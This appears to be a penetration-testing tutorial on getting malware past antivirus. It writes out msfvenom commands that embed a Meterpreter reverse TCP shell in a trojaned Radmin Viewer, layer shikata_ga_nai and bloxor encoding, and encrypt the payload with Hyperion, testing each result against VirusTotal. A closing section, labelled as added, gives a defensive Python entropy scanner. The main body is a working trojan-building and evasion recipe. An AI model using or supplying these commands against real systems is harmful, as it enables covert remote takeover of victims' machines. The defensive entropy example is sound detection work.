Bypassing Antivirus API


Bypassing Antivirus API Web Application Penetration Testing ‘17

Bypassing Antivirus API
Encoding a malicious file so that antivirus applications cannot detect it.
Highlights:
- Creating Trojans using msfvenom
- Encoding a Trojan
- Shikata_ga_nai encoding
- Multiencoding using msfvenom
- Hyperion

Creating Trojans using msfvenom
Trojan: a file carrying malicious code.
Creating a trojaned executable with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[host IP] LPORT=[desired port] -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe
This outputs a trojaned Radmin Viewer carrying a Meterpreter reverse TCP shell. It is used to exploit the Windows target machine when the infected Radmin Viewer is run.

Encoding a Trojan
The Trojan is encoded to keep antivirus applications from detecting it. Open a Kali terminal and type:
msfvenom -l encoders
This lists the available encoders with their rank and description. x86/shikata_ga_nai is the excellent-ranked Polymorphic XOR Additive Feedback Encoder.

Shikata_ga_nai Encoding
Shikata ga nai is Japanese for "It can't be helped". Encoding with shikata_ga_nai:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[host IP] LPORT=[desired port] -e x86/shikata_ga_nai -i 10 -f exe > Trojan.exe
Upload the resulting binary to the VirusTotal website and check the results. The result will not be very good, because antivirus vendors have signatures for the predefined Metasploit executable templates. Results can be improved by multiencoding the Trojan.

Multiencoding using msfvenom
In this demonstration, shikata_ga_nai and bloxor encoding are combined for multiencoding. First create a shikata_ga_nai-encoded RAW binary, which is then encoded again and output as an executable:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[host IP] LPORT=[desired port] -e x86/shikata_ga_nai -i 10 -f raw > Trojan1.bin
Now encode the raw output again with the bloxor encoder (-p - reads the payload from standard input):
msfvenom -p - -f exe -a x86 --platform windows -e x86/bloxor -i 10 > Trojan1.exe < Trojan1.bin
Upload the output executable to the VirusTotal website; the results will be much better, but still not the best.

Hyperion – Encrypting Meta Executable
Hyperion uses Advanced Encryption Standard (AES) encryption, the current industry-standard cipher. (The underlying process is rooted in cryptography.) Encrypting the Metasploit executable:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[host IP] LPORT=[desired port] -f exe > meta.exe
cd Hyperion-1.0/
wine ../hyperion ../meta.exe bypassavhyperion.exe
Upload the output executable to VirusTotal and check the result.
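An added defender-side example, not part of the original deck: a Hyperion-style AES-encrypted payload has near-maximal byte entropy, and a per-window entropy scan is one standard heuristic for flagging such a binary for closer analysis. The samples below are constructed stand-ins (text-like bytes and seeded pseudo-random bytes), not real executables.

```python
"""Entropy triage: the defender's counterpart to a crypter.
All sample data is constructed; no real binaries are involved."""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, from 0.0 (constant) to 8.0 (uniform over all 256 values)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = 1024, threshold: float = 7.2):
    """Return (offset, entropy) for each fixed-size window at or above threshold.
    7.2 bits/byte is a common packer/crypter cut-off; plain x86 code and
    text usually land around 4.5-6.5, encrypted or compressed data near 8."""
    hits = []
    for off in range(0, len(data) - window + 1, window):
        e = shannon_entropy(data[off:off + window])
        if e >= threshold:
            hits.append((off, round(e, 2)))
    return hits


# --- constructed samples (stand-ins, not real PE files) ---
# "Plain" region: text-like bytes drawn from a small alphabet.
PLAIN = (b"This program cannot be run in DOS mode.\r\n" * 30)[:1024]
# "Encrypted" region: seeded pseudo-random bytes standing in for an
# AES-encrypted section; the fixed seed keeps the example reproducible.
_rng = random.Random(1337)
ENCRYPTED = bytes(_rng.getrandbits(8) for _ in range(1024))
SAMPLE = PLAIN + ENCRYPTED + PLAIN


def triage(sample: bytes = SAMPLE) -> dict:
    """Summarise a blob: whole-file entropy plus the windows worth a closer look."""
    hits = high_entropy_windows(sample)
    return {
        "whole_file_entropy": round(shannon_entropy(sample), 2),
        "flagged_windows": hits,
        "suspicious": bool(hits),
    }


if __name__ == "__main__":
    print(triage())
```

High entropy is a triage signal rather than a verdict: compressed resources and legitimately packed software score just as high, so a hit should route the file to sandboxing or manual analysis, not straight to a block.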

Thanks